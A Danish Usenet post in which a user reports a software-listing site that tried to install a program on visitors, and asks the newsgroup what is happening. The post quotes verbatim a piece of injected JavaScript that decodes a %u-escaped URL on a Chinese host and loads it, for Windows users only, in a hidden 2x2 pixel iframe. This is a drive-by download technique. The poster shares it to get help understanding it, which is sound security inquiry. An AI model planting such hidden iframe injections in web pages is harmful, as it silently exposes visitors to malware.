X-post: dk.edb.sikkerhed.virus og
dk.edb.internet.webdesign.serverside.php
Follow-up: dk.edb.sikkerhed.virus
Da jeg søgt på Google kom bl.a denne site frem (denne her er nu
sidste side, så det var nok ikke den som Google havde indekseret):
http://www.softseaXXX.com/software/Wireless-Communication-List-5.html
De 3 X'er er der af sikkerhedshensyn. Brug en live CD eller lignende
hvis du besøger stedet.
Da jeg var inde første gang med IE7 (XP Pro, brugerkonto med
begrænset rettigheder) fik jeg en advarsel i pop-up blokeren om at
"noget" ville installerer et program. Ctrl-Alt-Del -> Programmer ->
Afslut job (Internet Explorer).
Så booter jeg fra en BackTrack3 live CD og vender tilbage.
Aller nederst på den sidste side finder jeg det her:
<script language="javascript">
var agt=navigator.userAgent.toLowerCase();
var win=((agt.indexOf("win")!=-1) || (agt.indexOf("32b")!=-1));
var nu='%u0068%u0074%u0074%u0070%u003a%u002f%u002f%u0078%u002d%
u0073'+
'%u006b%u0069%u0070%u002e%u0063%u006e%u002f%u0073%u0065%
u006f'+
'%u002e%u0070%u0068%u0070';
var ko=unescape(nu);
if (win)
{
var ahw=document.createElement('iframe');
ahw.style.border='0px';ahw.style.width='2px';
ahw.style.height='2px';ahw.src=ko;
document.body.appendChild(ahw);
}
</script>
Linierne er for lange til min News reader, men det der "%u00XY"
halløj linker til en side i Kina og en .php-fil.
Første linie ser sådan ud:
'%u0068%u0074%u0074%u0070%u003a%u002f%u002f%u0078%u002d%u0073'+
Anden linie:
'%u006b%u0069%u0070%u002e%u0063%u006e%u002f%u0073%u0065%u006f'+
Tredie linie
'%u002e%u0070%u0068%u0070'
Jeg kan godt oversætte ovenstående til det, der linkes til.
Men er der mon een der kan forklare mig hvad der sker. Jeg har prøvet
med at gå ind på kina-siden igen med IE7 og Firefox i BT3, men der
sker tilsyneladende ikke længere noget. I hvert fald popper advarslen
ikke op mer' i IE7. Der kommer noget med scripts i Firefox, men
scripts er delvis sat ud af kraft - BT3 er jo et sikkerheds suite.
--
"Well, opinions are like assholes. Everybody has one." Dirty Harry